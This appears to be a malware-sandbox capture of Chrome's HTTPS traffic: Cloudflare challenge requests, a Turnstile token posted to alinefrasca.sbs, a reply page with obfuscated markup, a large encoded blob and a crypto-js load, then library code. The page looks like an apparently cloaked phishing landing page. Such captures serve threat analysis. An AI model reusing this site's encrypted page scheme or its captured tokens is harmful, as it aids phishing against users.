                                                                            2024-10-28 08:36:34 UTC389INData Raw: 55 78 37 75 6c 70 34 4f 37 6d 4d 2b 69 73 73 6a 50 6e 4b 65 50 72 4d 53 75 70 62 54 4e 73 36 6d 30 7a 73 44 6a 30 5a 7a 47 78 4b 2b 6b 79 73 58 61 33 63 4b 35 78 36 7a 45 38 2b 4c 68 79 38 54 51 36 64 72 56 78 2f 72 65 79 64 4d 43 31 39 33 78 41 39 6d 2f 7a 77 58 64 35 64 50 45 34 39 7a 6b 2f 4f 58 74 36 41 4c 6f 43 41 6f 56 2b 52 77 50 44 2f 41 66 33 74 76 31 4a 4f 2f 66 2b 42 6a 33 4b 41 73 47 49 43 4d 67 4c 4f 30 6a 41 69 67 67 4d 4f 34 4f 38 54 6e 33 4b 68 50 31 4f 44 6b 77 4c 43 38 6b 46 52 4d 34 41 78 34 6b 50 44 30 34 4b 30 42 42 54 79 5a 47 52 55 41 77 53 45 6c 57 4a 42 55 55 52 44 63 59 57 44 70 4c 48 79 34 2f 55 6a 46 6b 55 54 68 42 49 6c 64 4d 4c 45 39 77 52 69 30 74 58 56 46 6d 4d 6e 64 56 59 32 70 4d 55 54 41 31 65 31 42 6a 4f 6f 56 65 59 45
                                                                            Data Ascii: Ux7ulp4O7mM+issjPnKePrMSupbTNs6m0zsDj0ZzGxK+kysXa3cK5x6zE8+Lhy8TQ6drVx/reydMC193xA9m/zwXd5dPE49zk/OXt6ALoCAoV+RwPD/Af3tv1JO/f+Bj3KAsGICMgLO0jAiggMO4O8Tn3KhP1ODkwLC8kFRM4Ax4kPD04K0BBTyZGRUAwSElWJBUURDcYWDpLHy4/UjFkUThBIldMLE9wRi0tXVFmMndVY2pMUTA1e1BjOoVeYE


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.449771104.18.94.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:35 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/101271322:1730103188:6HRbbJs87_HiCSIrxrZZgbsUH28xnY_4sVI_cjvAKEk/8d9998e48bc0e98b/S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rE HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:35 UTC379INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 28 Oct 2024 08:36:35 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 7
                                                                            Connection: close
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            cf-chl-out: BZhc6AkNbS45rZJz3vqK8xRy3UN3psfkuqM=$1PEbeCTnvwlHQdWA
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999959bd342e61-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:35 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                            Data Ascii: invalid


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.449772188.114.97.34431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:36 UTC888OUTPOST /pktcr/ HTTP/1.1
                                                                            Host: alinefrasca.sbs
                                                                            Connection: keep-alive
                                                                            Content-Length: 859
                                                                            Cache-Control: max-age=0
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Upgrade-Insecure-Requests: 1
                                                                            Origin: https://alinefrasca.sbs
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: navigate
                                                                            Sec-Fetch-User: ?1
                                                                            Sec-Fetch-Dest: document
                                                                            Referer: https://alinefrasca.sbs/pktcr/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Cookie: PHPSESSID=0vnljmd907ev27c68sitpt9phh
                                                                            2024-10-28 08:36:36 UTC859OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 6a 56 4c 56 4e 51 75 74 48 42 75 69 55 4a 5a 4d 37 70 78 78 52 77 61 71 6c 62 39 4d 38 43 41 4f 67 63 76 77 71 61 53 41 54 4c 42 2d 4f 64 48 49 63 66 66 49 4a 31 34 41 71 73 55 75 58 4b 66 30 55 33 43 5f 77 77 4b 49 69 4b 7a 4c 63 4e 36 55 5a 52 55 4d 30 30 76 6e 4e 6a 54 35 68 38 5a 45 6f 6d 70 49 55 71 4e 5a 48 45 78 71 65 47 41 6d 38 62 52 59 56 46 5f 5f 4e 6d 76 58 32 71 41 36 74 79 61 30 30 70 30 55 74 76 66 46 33 34 7a 2d 52 4c 61 61 74 62 4d 44 58 41 45 7a 54 74 6e 72 51 34 57 42 7a 4f 6f 30 31 6a 7a 43 7a 39 74 31 6f 64 41 72 30 6a 32 6e 38 54 76 65 2d 37 43 51 4f 63 41 67 71 54 59 6a 38 53 65 55 50 4c 55 36 36 47 6f 49 41 4c 6f 4b 77 6a 64 5a 53 79 64 32 43 32 42 74 75 6d 56
                                                                            Data Ascii: cf-turnstile-response=0.jVLVNQutHBuiUJZM7pxxRwaqlb9M8CAOgcvwqaSATLB-OdHIcffIJ14AqsUuXKf0U3C_wwKIiKzLcN6UZRUM00vnNjT5h8ZEompIUqNZHExqeGAm8bRYVF__NmvX2qA6tya00p0UtvfF34z-RLaatbMDXAEzTtnrQ4WBzOo01jzCz9t1odAr0j2n8Tve-7CQOcAgqTYj8SeUPLU66GoIALoKwjdZSyd2C2BtumV
                                                                            2024-10-28 08:36:36 UTC962INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:36 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.3.33
                                                                            access-control-allow-origin: *
                                                                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            cache-control: no-store, no-cache, must-revalidate
                                                                            pragma: no-cache
                                                                            vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbU%2FZEJsLjxdYNKTJVz%2FCsLiTD7SdeJq9c81GIeyurSod5Uv%2FnMSwqNc9%2Fk3BV1EsL6CO%2FfXCwsH7u5C5WiY3Fuv80xNKfm2MML9%2B0vr8wit6ekHJ10EekM7Ueh6q2lJcMQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d99995d7bd56b5f-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1637&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2347&delivery_rate=1738295&cwnd=251&unsent_bytes=0&cid=38f98e083162c745&ts=709&x=0"
                                                                            2024-10-28 08:36:36 UTC407INData Raw: 31 38 64 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0a 0a 20 3c 68 65 61 64 3e 0d 0a 0a 20 20 09 3c 6d 65 74 61 09 09 09 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 09 09 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 09 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 09 09 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 0a 09 20 20 3c 73 63 72 69 70 74 09 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 09 3c 2f 73 63
                                                                            Data Ascii: 18db<html> <head> <metaname="viewport" content="width=device-width,initial-scale=1.0"><meta name="robots"content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></sc
                                                                            2024-10-28 08:36:36 UTC1369INData Raw: 09 20 7b 20 09 30 25 20 20 2c 20 31 30 30 25 20 09 20 2c 20 20 09 31 32 2e 35 25 09 20 2c 09 33 32 2e 35 25 09 2c 09 37 36 2e 31 25 20 20 7b 09 74 72 61 6e 73 66 6f 72 6d 3a 09 09 74 72 61 6e 73 6c 61 74 65 59 28 30 29 20 7d 09 32 32 2e 35 25 09 09 2c 20 20 20 38 36 25 20 20 09 7b 20 20 09 74 72 61 6e 73 66 6f 72 6d 3a 09 20 74 72 61 6e 73 6c 61 74 65 59 28 37 70 78 29 09 09 7d 20 20 20 7d 20 09 09 23 79 65 61 72 73 20 20 7b 20 68 65 69 67 68 74 3a 20 31 37 39 70 78 3b 77 69 64 74 68 3a 20 09 20 31 33 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 09 09 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 09 20 2d 35 39 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 09 20 32 35 70 78 09 7d 20 09 40 6b 65 79 66 72 61 6d 65 73 20 73 68 61 64 6f 77 2d 66 61 64 65
                                                                            Data Ascii: { 0% , 100% , 12.5% ,32.5%,76.1% {transform:translateY(0) }22.5%, 86% { transform: translateY(7px)} } #years { height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px} @keyframes shadow-fade
                                                                            2024-10-28 08:36:36 UTC1369INData Raw: 7b 20 20 09 74 72 61 6e 73 66 6f 72 6d 3a 09 09 09 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 09 20 73 63 61 6c 65 59 28 30 2e 39 36 29 20 09 7d 09 20 09 33 34 25 09 09 2c 20 09 09 36 38 2e 35 25 20 09 09 7b 09 09 74 72 61 6e 73 66 6f 72 6d 3a 20 09 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 09 73 63 61 6c 65 59 28 31 29 09 20 09 7d 20 20 36 38 2e 35 25 09 09 7b 20 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 09 09 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 36 20 20 20 2c 20 09 2d 30 2e 31 36 09 09 09 2c 20 09 31 20 2c 09 20 09 2d 30 2e 32 39 29 20 7d 09 20 7d 09 09 20 23 76 61 63 63 69 6e 65 09 3e 20 09 2e 6a 61 69 6c 09 7b 09 09 77 69 64 74 68 3a 09 31 31 38 70 78 3b 68 65 69 67 68 74 3a 09 09 09 32 31
                                                                            Data Ascii: { transform:translateY(51px) scaleY(0.96) } 34%, 68.5% {transform: translateY(51px) scaleY(1) } 68.5%{ animation-timing-function:cubic-bezier(0.66 , -0.16, 1 , -0.29) } } #vaccine> .jail{width:118px;height:21
                                                                            2024-10-28 08:36:36 UTC1369INData Raw: 09 20 2c 09 31 30 30 25 20 20 2c 09 09 37 37 25 20 2c 20 38 2e 35 25 09 7b 09 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 09 72 6f 74 61 74 65 33 64 28 31 20 2c 20 20 09 30 09 09 2c 20 09 30 20 20 2c 09 30 29 09 20 7d 20 20 31 34 2e 35 25 20 20 2c 20 09 09 37 36 25 20 20 7b 09 09 09 74 72 61 6e 73 66 6f 72 6d 3a 20 20 09 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 20 72 6f 74 61 74 65 33 64 28 31 20 2c 20 20 30 20 2c 20 09 30 09 20 20 2c 20 39 30 64 65 67 29 09 09 7d 09 7d 20 09 20 23 75 6b 65 6c 65 6c 65 20 20 20 7b 20 20 20 77 69 64 74 68 3a 20 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 09 31 30 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 09 20 68 69 64 64 65 6e 09 20 20 7d 20 20 09 2e 72 61 62 69 64 09
                                                                            Data Ascii: ,100% ,77% , 8.5%{transform: translateY(-71px) rotate3d(1 , 0, 0 ,0) } 14.5% , 76% {transform: translateY(-71px) rotate3d(1 , 0 , 0 , 90deg)}} #ukelele { width: 130px;height:107px;overflow: hidden } .rabid
                                                                            2024-10-28 08:36:36 UTC1369INData Raw: 09 3c 2f 64 69 76 3e 20 20 20 3c 2f 64 69 76 3e 20 09 3c 64 69 76 09 09 20 69 64 3d 22 77 61 63 6b 79 22 3e 09 3c 2f 64 69 76 3e 09 20 09 3c 64 69 76 20 09 69 64 3d 22 74 61 63 69 74 75 72 6e 6c 79 22 3e 20 20 20 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 72 61 63 65 77 61 79 22 3e 09 09 20 3c 2f 64 69 76 3e 20 20 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 79 65 61 72 6c 79 22 3e 20 09 3c 2f 64 69 76 3e 09 20 3c 2f 64 69 76 3e 20 3c 64 69 76 20 20 69 64 3d 22 77 61 69 74 72 65 73 73 22 3e 20 3c 64 69 76 20 20 69 64 3d 22 75 6b 65 6c 65 6c 65 22 3e 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 61 62 69 64 22 3e 20 20 09 3c 2f 64 69 76 3e 20 09 09 3c 2f 64 69 76 3e 09 3c 2f 64 69 76 3e 09 20 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 2f 62 6f 64 79 3e 0d 0a 0a 3c 21 2d 2d 09
                                                                            Data Ascii: </div> </div> <div id="wacky"></div> <div id="taciturnly"> <div class="raceway"> </div> <div class="yearly"> </div> </div> <div id="waitress"> <div id="ukelele"><div class="rabid"> </div> </div></div> </div> </body>...
                                                                            2024-10-28 08:36:36 UTC488INData Raw: 79 4f 44 68 69 59 6a 52 6b 4d 32 51 35 5a 6d 51 31 4d 54 4e 6b 4f 54 56 6d 4d 32 55 78 4d 6a 4a 6d 4e 7a 63 78 5a 44 64 68 4d 7a 64 69 59 54 45 32 59 57 49 35 4f 57 4d 33 4d 7a 49 77 5a 44 6b 31 4d 44 67 32 5a 57 52 68 59 6d 52 6a 4e 54 4e 6c 4d 6d 49 78 59 6d 59 78 4d 7a 49 32 5a 6d 4d 77 4d 54 42 69 4d 54 51 31 4d 54 46 69 5a 47 55 77 5a 54 59 79 59 54 4a 6d 4e 54 45 33 4e 6a 56 6d 4f 57 4a 6d 5a 6a 64 6b 4d 6d 45 7a 59 7a 45 34 4f 44 46 6c 5a 6a 6b 79 5a 6a 6b 78 4d 44 4e 6b 5a 6a 45 35 5a 44 41 34 59 54 4e 68 4f 44 5a 6a 5a 6a 41 33 4d 57 49 78 4e 47 49 33 5a 44 59 30 4d 44 4e 68 4d 44 4d 30 4d 54 42 6a 4e 7a 51 30 59 54 63 7a 5a 6d 5a 6c 4e 54 68 6b 5a 44 56 6b 4e 6a 41 30 59 6d 52 6d 4d 7a 51 33 4d 32 56 6b 4d 44 6b 33 49 69 77 69 5a 43 49 36 49 6a
                                                                            Data Ascii: yODhiYjRkM2Q5ZmQ1MTNkOTVmM2UxMjJmNzcxZDdhMzdiYTE2YWI5OWM3MzIwZDk1MDg2ZWRhYmRjNTNlMmIxYmYxMzI2ZmMwMTBiMTQ1MTFiZGUwZTYyYTJmNTE3NjVmOWJmZjdkMmEzYzE4ODFlZjkyZjkxMDNkZjE5ZDA4YTNhODZjZjA3MWIxNGI3ZDY0MDNhMDM0MTBjNzQ0YTczZmZlNThkZDVkNjA0YmRmMzQ3M2VkMDk3IiwiZCI6Ij
                                                                            2024-10-28 08:36:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.449774104.17.25.144431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:37 UTC561OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                            Host: cdnjs.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: script
                                                                            Referer: https://alinefrasca.sbs/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:37 UTC956INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:37 GMT
                                                                            Content-Type: application/javascript; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: public, max-age=30672000
                                                                            ETag: W/"5eb03e2d-bb78"
                                                                            Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                            cf-cdnjs-via: cfworker/kv
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Timing-Allow-Origin: *
                                                                            X-Content-Type-Options: nosniff
                                                                            CF-Cache-Status: HIT
                                                                            Age: 315087
                                                                            Expires: Sat, 18 Oct 2025 08:36:37 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYU%2BXUv5TvoDnbFTqisoWwU%2FMGxfUVPhvuuKrUvPOI8jK1F8YHQvcjc80sK4gWagn4wXNPDL4hAdNwNsG8SguITeQlxGbZU2MnOvnCVE0an3htyGSTcwmTwyAWncfCRuD1tqw5Ad"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                            Strict-Transport-Security: max-age=15780000
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999966283d3aac-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:37 UTC413INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                            Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                            2024-10-28 08:36:37 UTC1369INData Raw: 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e
                                                                            Data Ascii: ndow.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.
                                                                            2024-10-28 08:36:37 UTC1369INData Raw: 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e
                                                                            Data Ascii: <n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function
                                                                            2024-10-28 08:36:37 UTC1369INData Raw: 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42
                                                                            Data Ascii: ,this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessB
                                                                            2024-10-28 08:36:37 UTC1369INData Raw: 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30
                                                                            Data Ascii: ?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0
                                                                            2024-10-28 08:36:37 UTC1369INData Raw: 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28
                                                                            Data Ascii: ]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((
